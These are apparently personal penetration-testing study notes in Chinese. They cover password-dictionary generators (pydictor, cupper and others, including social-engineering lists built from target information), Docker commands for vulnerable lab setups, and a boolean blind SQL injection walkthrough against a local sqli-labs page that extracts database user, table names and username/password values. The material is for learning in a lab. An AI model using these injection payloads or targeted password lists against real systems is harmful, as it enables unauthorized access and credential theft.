pydictor,强大的密码生成工具,可以合并密码字典,词频统计,去重,枚举数字字典
生成字典
python3 pydictor.py -base d --len 4 4 生成纯数字4位密码
python3 pydictor.py -base L --len 1 4 -o name.txt 生成1-4位纯字母字典,长度为1-4位,输出名字文件为 name.txt
python3 pydictor.py -extend F:\工具\pydictor\ex.txt --level 3 --len 3 10 -o sym.txt 根据提前给出的关于要作的攻击对象的信息文件,level过滤结果的级别为3,生成长度为3-10位的字典,文件名为sym.txt,密码内容是弱口令+用户信息+过滤机制
python3 pydictor.py -extend F:\工具\pydictor\ex.txt 3 --len 3 10 --encode sha1 -o mima.txt ,生成sha1加密的字典,--encode 生成加密字典
python3 pydictor.py --sedb 接下来输入收集的信息,最后可以设置输出路径,再运行生成社工字典,设置收集的信息使用 set enname test,ouput路径,设置输出路径,run运行

cupper,针对国人的社工密码生成器
cupper -i 交互式输入收集的信息生成字典

wordhound 基于推特搜索,pdf文档,reddit子网创建字典

brutescrape,基于网站爬取的密码生成,编辑sites.scrape文件,添加要生成密码的网站连接,运行python brutescrape.py即可

docker入门及漏洞环境搭建
开源的应用程序容器引擎,使用go语言开发,借助于docker打包的应用程序,将这些应用程序包含在容器下,在容器中实现虚拟化,容器使用的是沙箱机制,沙箱之间相互独立,占用资源非常少

docker的三个概念
镜像:image,docker镜像,是一个只读模版,镜像可以创建容器,比如在镜像中包含完整的操作系统,在该操作系统中,可以安装lamp环境,镜像可以创建容器
容器:container,docker利用容器来运行应用程序,容器是从镜像中创建运行的实例,容器可以运行,关闭,删除
仓库:repository,集中放镜像的地方,每个仓库可包含了多个镜像,可以私有可以公开,最大的仓库是dockerhub(hub.docker.com)
1,更新源,apt-get install docker.io
2,替换加速器,vim /etc/docker/daemon.json
{
"registry-mirrors": [
"https://dockerhub.azk8s.cn",
"https://reg-mirror.qiniu.com"
]
}
docker info 查看配置

docker镜像操作命令
docker serrch mysql,搜索mysql镜像
docker pull 镜像名称,下载镜像
docker images 查看本地下载好的镜像
docker rmi 镜像id,删除镜像

docker容器操作命令
docker run -d -p 8080:80 --rm --name 容器名 镜像id
run 运行
-d 表示后台运行
-p 1端口:2端口,将容器内部服务2端口,映射到本地1端口,如果-p后不手动设置端口,会随机分配端口
rm 当容器停止会自动删除
--name 容器运行成功之后,容器名称
镜像id或镜像名
docker ps 查看当前运行的容器
docker ps -a查看所有运行的容器的状态
docker stop 容器名或容器Id,停止容器
docker start 容器id,打开容器,如果运行容器时候加--rm就会在关闭的时候自动删除
docker rm 容器名称或容器id,删除容器
docker exec -it 容器名或容器id /bin/bash 进入容器内部,-it表示交互模式 ,输入exit退出容器

导入导出镜像
docker save 镜像id > 名字.tar ,导出镜像
docker load < 容器名字.tar ,导入镜像

sql注入盲注
用户提交的数据在后台数据库执行之后,没有返回任何数据到前端,无法在前端显示,需要使用盲注

基于布尔型盲注
1,探测输入点,'/1' and 1=1%23 /1' and '1'='1
注意,用户提交的数据被带入到数据库中执行,根据页面显示效果判断此处是否有注入点
2,收集数据库信息,当前用户名,当前数据库,数据库版本,所有数据库,等
http://127.0.0.1/sqli/Less-8/index.php?id=1' and length(user())=14%23
可以使用bp抓包,猜测出当前用户名长度,数据库长度等
http://127.0.0.1/sqli/Less-8/index.php?id=1' and ascii(substr(user(),1,1))=1%23
判断用户名首字母首字符
127.0.0.1/sqli/Less-8/index.php?id=1' and ascii(substr(user(),2,2))=114%23,后续依次判断,可以使用BP,看到pyload2位置的数字,转码之后得到当前用户是root@localhost
3,判断当前数据库
http://127.0.0.1/sqli/Less-8/index.php?id=1' and ascii(substr(user(),2,2))=114%23,bp爆破之后,看pyload2位置数字,转码之后得到数据库为secutity数据库
查询当前数据库的表
先计算某个表的名字长度
再判断表中的每个字符
http://127.0.0.1/sqli/Less-8/index.php?id=1' and ascii(substr((select distinct table_name from information_schema.columns where table_schema=database() limit 0,1),1,1))=101%23,bp爆破,判断出security中表有emails,users,等
4,获取制定表的字段名
http://127.0.0.1/sqli/Less-8/index.php?id=1' and ascii(substr((select distinct table_name from information_schema.columns where table_schema=database() limit 0,1),1,1))=101%23,bp爆破得出字段名首字母是i
最后依次判断第一个字段名,第二个字段名
最后找出敏感的字段,比如 username password
5,获取指定字段的值
http://127.0.0.1/sqli/Less-8/index.php?id=1' and ascii(substr((select group_concat(username,0x7e,password) from users limit 0,1),1,1))=105%23
6,解密密文数据,登录后台

2019-9-9:渗透测试,基础学习,pydictor使用,sql盲注,docker使用,笔记的更多相关文章

  1. SQL盲注学习-布尔型

    本次实验还是使用sqli-labs环境.在开始SQL盲注之前首先学习一下盲注需要用到的基础语法. 1.left()函数:left(str,lenth)它返回具有指定长度的字符串的左边部分. left( ...

  2. 小白日记42:kali渗透测试之Web渗透-SQL盲注

    SQL盲注 [SQL注入介绍] SQL盲注:不显示数据库内建的报错信息[内建的报错信息帮助开发人员发现和修复问题],但由于报错信息中提供了关于系统的大量有用信息.当程序员隐藏了数据库内建报错信息,替换 ...

  3. 零基础到精通Web渗透测试的学习路线

    小编相信很多新手都会遇到以下几个问题 1.零基础想学渗透怎么入手? 2.学习web渗透需要从哪里开始? 这让很多同学都处于迷茫状态而迟迟不下手,小编就在此贴给大家说一下web渗透的学习路线,希望对大家 ...

  4. WEB渗透测试基础工具

    代理查询网站:hidemyass(隐藏我的屁股) HTTrack:HTTrack是一个免费和易用的离线浏览工具(浏览器),它可以允许你下载整个WWW网站至本地目录,并且通过遍历网站目录获取HTML,图 ...

  5. SQL盲注测试高级技巧

    写在前面: 这篇文章主要写了一些加快盲注速度的技巧和盲注中比较精巧的语句,虽然注入并不是什么新技术了.但是数据库注入漏洞依然困扰着每一个安全厂商,也鞭策着每一个安全从业者不断前进. 正文: 首先来简单 ...

  6. SQL盲注学习-时间型

    本次对时间型盲注进行学习,还是的使用sqli-labs环境. 首先看一下时间型盲注需要用到的: 1.if()函数   if(a,b,c) 如果a为真则执行b,否则执行c.如图,由于1=1为真所以执行第 ...

  7. 2019-9-17:渗透测试,基础学习,apache初识,mysql初识等笔记

    python -m SimpleHTTPServer gedit 文本编辑器 apache2 默认配置文件目录:/etc/apache2/apache2默认首页源码: /var/www/html my ...

  8. kali渗透测试基础

    一侦查 研究如何收集有关目标的情报,比如开发那些端口用来通信,托管在哪里,提供给客户的服务类型等. 交付内容应该包括需要攻击的所有目标资产清单,与那些资产关联的应用,使用的服务以及可能的资产所有者. ...

  9. kali黑客渗透测试基础环境准备

    1.apt-get install python-nmap 2.apt-get install python-setuptools 正在读取软件包列表... 完成 正在分析软件包的依赖关系树      ...

随机推荐

  1. (day27)subprocess模块+粘包问题+struct模块+ UDP协议+socketserver

    目录 昨日回顾 软件开发架构 C/S架构 B/S架构 网络编程 互联网协议 socket套接字 今日内容 一.subprocess模块 二.粘包问题 三.struct模块 四.UDP 五.QQ聊天室 ...

  2. Java多线程编程(七)线程状态、线程组与异常处理

    一.线程的状态 线程对象在不同的运行时期有不同的状态,状态信息就存在于State枚举类中. 调用与线程有关的方法后,会进入不同的线程状态,这些状态之间某些是可双向切换的,比如WAITING和RUNNI ...

  3. 卷积神经网络详细讲解 及 Tensorflow实现

    [附上个人git完整代码地址:https://github.com/Liuyubao/Tensorflow-CNN] [如有疑问,更进一步交流请留言或联系微信:523331232] Reference ...

  4. 阿里六面,挂在hrg,我真的不甘心!

    前言最近跟一位朋友聊天,福报场-阿里是大部分程序员的梦想.这位老哥梦想进入阿里很久了,连续两年面试阿里不同bu,有几次是技术面挂,最冤的一次是技术6面了,连P10大老板都面了,但是挂在了hrg. 我以 ...

  5. Method Not Allowed (GET): /boxuegos/index/ 错误

    1,Method Not Allowed (GET) 请求方法不被允许, 错误原因:我调用的是index这个方法,但是我上面定义了一个空的子路由,所以页面加载不了,控制台出现Method Not Al ...

  6. 相关推导式-Python

    列表.’字典等推导式 #利用zip()函数同时给多个变量赋值 a = [1,2,3,4,5] b = [4,5,6,7,8] c = [9,2,3,4,0] l = [[1,2],[3,4]] for ...

  7. JC的小苹果 逆矩阵

    这题主要有两种做法:1种是用逆矩阵,转移时无须高斯消元.2是将常数项回代.这里主要介绍第一种. 首先题里少个条件:点权非负.设f [ i ][ j ]表示hp为i时,到达j点的期望次数. 那么若点权为 ...

  8. Asp.net Core 系列之--3.领域、仓储、服务简单实现

    ChuanGoing 2019-11-11  距离上篇近两个月时间,一方面时因为其他事情耽搁,另一方面也是之前准备不足,关于领域驱动有几个地方没有想通透,也就没有继续码字.目前网络包括园子里大多领域驱 ...

  9. java应用性能调优之详解System的gc垃圾回收方法

    一.什么是System.gc()? System.gc()是用Java,C#和许多其他流行的高级编程语言提供的API.当它被调用时,它将尽最大努力从内存中清除垃圾(即未被引用的对象).名词解释:GC, ...

  10. m74 考试反思

    这次不叫考试题解,叫做考试反思,为什么折磨说,因为这次犯的错误太多了! 事情还要从昨天晚上说起,昨晚放学,班主任来机房说我被子不合格,要停课反思 ###&&¥%#%¥@#%¥#@……% ...